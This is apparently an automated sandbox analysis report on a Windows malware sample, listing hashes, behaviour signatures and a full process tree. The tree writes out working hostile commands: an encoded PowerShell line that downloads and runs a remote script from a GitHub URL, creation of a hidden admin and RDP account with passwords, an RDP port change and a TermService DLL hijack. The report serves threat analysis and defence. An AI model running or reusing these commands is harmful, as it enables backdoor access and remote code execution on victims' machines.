Analysis

  • max time kernel
    140s
  • max time network
    118s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    26-06-2021 19:18

General

  • Target

    0533044b6e65dbe2c84f78e43a37a0a0.exe

  • Size

    5.7MB

  • MD5

    0533044b6e65dbe2c84f78e43a37a0a0

  • SHA1

    0513796322ed3364335eb9c47faad3324ff162fc

  • SHA256

    57bd1d7a3ce9a10797575f75af56a675b3739ab5901e383a7870b17fa328ecb4

  • SHA512

    b2dca40a006af96fdb10adc20d9ae8bdb4f3d47d7b179ffd2f3598b9ef8ffe940fc0145f438694ca2b9950c09cd625609824506bdc191ee9077116749406c6d6

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Executes dropped EXE 3 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0533044b6e65dbe2c84f78e43a37a0a0.exe
    "C:\Users\Admin\AppData\Local\Temp\0533044b6e65dbe2c84f78e43a37a0a0.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1832
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd < Sembri.msi
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2384
      • C:\Windows\SysWOW64\cmd.exe
        cmd
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1492
        • C:\Windows\SysWOW64\findstr.exe
          findstr /V /R "^XQEyYadmfWSQDrabDldTAIAXftifvkpFGaizkPlkqriNYNkvbdDAcnefdHPUkqerMhpkVYjNZySvAMYCSKSuIIpifRrEqdqZqtqLDqBntPBdGFPDIhwAiW$" Dipinte.msi
          4⤵
            PID:2148
          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sua.exe.com
            Sua.exe.com J
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:596
            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sua.exe.com
              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sua.exe.com J
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:1584
              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sua.exe.com
                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sua.exe.com
                6⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2840
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                  7⤵
                  • Deletes itself
                  • Drops file in Windows directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2944
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3mszpazg\3mszpazg.cmdline"
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3916
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES88A9.tmp" "c:\Users\Admin\AppData\Local\Temp\3mszpazg\CSC3C0283C3D0648619D8DA8BDEB87BBCF.TMP"
                      9⤵
                        PID:2300
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                      8⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3696
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                      8⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2148
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                      8⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3832
                    • C:\Windows\system32\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                      8⤵
                        PID:1632
                      • C:\Windows\system32\reg.exe
                        "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                        8⤵
                        • Modifies registry key
                        PID:932
                      • C:\Windows\system32\reg.exe
                        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                        8⤵
                          PID:1380
                        • C:\Windows\system32\net.exe
                          "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                          8⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3600
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                            9⤵
                              PID:2132
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                            8⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3644
                            • C:\Windows\system32\cmd.exe
                              cmd /c net start rdpdr
                              9⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3628
                              • C:\Windows\system32\net.exe
                                net start rdpdr
                                10⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2740
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 start rdpdr
                                  11⤵
                                    PID:3172
                            • C:\Windows\system32\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                              8⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2208
                              • C:\Windows\system32\cmd.exe
                                cmd /c net start TermService
                                9⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3404
                                • C:\Windows\system32\net.exe
                                  net start TermService
                                  10⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1848
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 start TermService
                                    11⤵
                                      PID:4044
                              • C:\Windows\system32\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                8⤵
                                  PID:3924
                                • C:\Windows\system32\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                  8⤵
                                    PID:1848
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 127.0.0.1 -n 30
                            4⤵
                            • Runs ping.exe
                            PID:3852
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user wgautilacc Ghar4f5 /del
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2260
                      • C:\Windows\system32\net.exe
                        net.exe user wgautilacc Ghar4f5 /del
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:656
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
                          3⤵
                            PID:1352
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe user wgautilacc D2kFlKIV /add
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3836
                        • C:\Windows\system32\net.exe
                          net.exe user wgautilacc D2kFlKIV /add
                          2⤵
                            PID:824
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 user wgautilacc D2kFlKIV /add
                              3⤵
                                PID:408
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                            1⤵
                              PID:928
                              • C:\Windows\system32\net.exe
                                net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                2⤵
                                  PID:1368
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                    3⤵
                                      PID:2128
                                • C:\Windows\System32\cmd.exe
                                  cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                                  1⤵
                                    PID:2272
                                    • C:\Windows\system32\net.exe
                                      net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                                      2⤵
                                        PID:3064
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                                          3⤵
                                            PID:3632
                                      • C:\Windows\System32\cmd.exe
                                        cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                        1⤵
                                          PID:2024
                                          • C:\Windows\system32\net.exe
                                            net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                            2⤵
                                              PID:876
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
                                                3⤵
                                                  PID:1352
                                            • C:\Windows\System32\cmd.exe
                                              cmd /C net.exe user wgautilacc D2kFlKIV
                                              1⤵
                                                PID:1412
                                                • C:\Windows\system32\net.exe
                                                  net.exe user wgautilacc D2kFlKIV
                                                  2⤵
                                                    PID:3696
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 user wgautilacc D2kFlKIV
                                                      3⤵
                                                        PID:828
                                                  • C:\Windows\System32\cmd.exe
                                                    cmd.exe /C wmic path win32_VideoController get name
                                                    1⤵
                                                      PID:4056
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic path win32_VideoController get name
                                                        2⤵
                                                          PID:2740
                                                      • C:\Windows\System32\cmd.exe
                                                        cmd.exe /C wmic CPU get NAME
                                                        1⤵
                                                          PID:3644
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic CPU get NAME
                                                            2⤵
                                                              PID:3916
                                                          • C:\Windows\System32\cmd.exe
                                                            cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                            1⤵
                                                              PID:876
                                                              • C:\Windows\system32\cmd.exe
                                                                cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                2⤵
                                                                  PID:1352
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                    3⤵
                                                                    • Blocklisted process makes network request
                                                                    • Drops file in Program Files directory
                                                                    • Drops file in Windows directory
                                                                    • Modifies data under HKEY_USERS
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:3600
                                                              • C:\Windows\System32\cmd.exe
                                                                cmd.exe /C net user wgautilacc 1234
                                                                1⤵
                                                                  PID:3872
                                                                  • C:\Windows\system32\net.exe
                                                                    net user wgautilacc 1234
                                                                    2⤵
                                                                      PID:784
                                                                      • C:\Windows\system32\net1.exe
                                                                        C:\Windows\system32\net1 user wgautilacc 1234
                                                                        3⤵
                                                                          PID:3644

                                                                    Network

                                                                    MITRE ATT&CK Enterprise v6

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • memory/1584-127-0x00000250C1D20000-0x00000250C1D21000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/2148-219-0x0000023FA3EC3000-0x0000023FA3EC5000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/2148-222-0x0000023FA3EC8000-0x0000023FA3ECA000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/2148-218-0x0000023FA3EC0000-0x0000023FA3EC2000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/2148-220-0x0000023FA3EC6000-0x0000023FA3EC8000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/2840-134-0x0000026A41D03000-0x0000026A41D05000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/2840-133-0x0000026A41D00000-0x0000026A41D02000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/2840-136-0x0000026A41D06000-0x0000026A41D07000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/2840-135-0x0000026A41D05000-0x0000026A41D06000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/2840-128-0x0000026A1A7A0000-0x0000026A1AC7B000-memory.dmp

                                                                      Filesize

                                                                      4.9MB

                                                                    • memory/2840-131-0x0000026A5A8C0000-0x0000026A5AB6A000-memory.dmp

                                                                      Filesize

                                                                      2.7MB

                                                                    • memory/2840-130-0x0000026A1A7A0000-0x0000026A1AC7B000-memory.dmp

                                                                      Filesize

                                                                      4.9MB

                                                                    • memory/2944-143-0x0000020031E50000-0x0000020031E51000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/2944-150-0x000002004C220000-0x000002004C221000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/2944-170-0x000002004C760000-0x000002004C761000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/2944-172-0x000002004CAF0000-0x000002004CAF1000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/2944-171-0x000002004A148000-0x000002004A149000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/2944-164-0x000002004A0C0000-0x000002004A0C1000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/2944-157-0x000002004A146000-0x000002004A148000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/2944-144-0x000002004A140000-0x000002004A142000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/2944-146-0x000002004A143000-0x000002004A145000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/3600-261-0x000002B126086000-0x000002B126088000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/3600-260-0x000002B126083000-0x000002B126085000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/3600-259-0x000002B126080000-0x000002B126082000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/3600-262-0x000002B126088000-0x000002B126089000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/3696-216-0x0000018D75868000-0x0000018D7586A000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/3696-215-0x0000018D75866000-0x0000018D75868000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/3696-191-0x0000018D75860000-0x0000018D75862000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/3696-192-0x0000018D75863000-0x0000018D75865000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/3832-224-0x0000029D257D3000-0x0000029D257D5000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/3832-226-0x0000029D257D8000-0x0000029D257DA000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/3832-225-0x0000029D257D6000-0x0000029D257D8000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/3832-223-0x0000029D257D0000-0x0000029D257D2000-memory.dmp

                                                                      Filesize

                                                                      8KB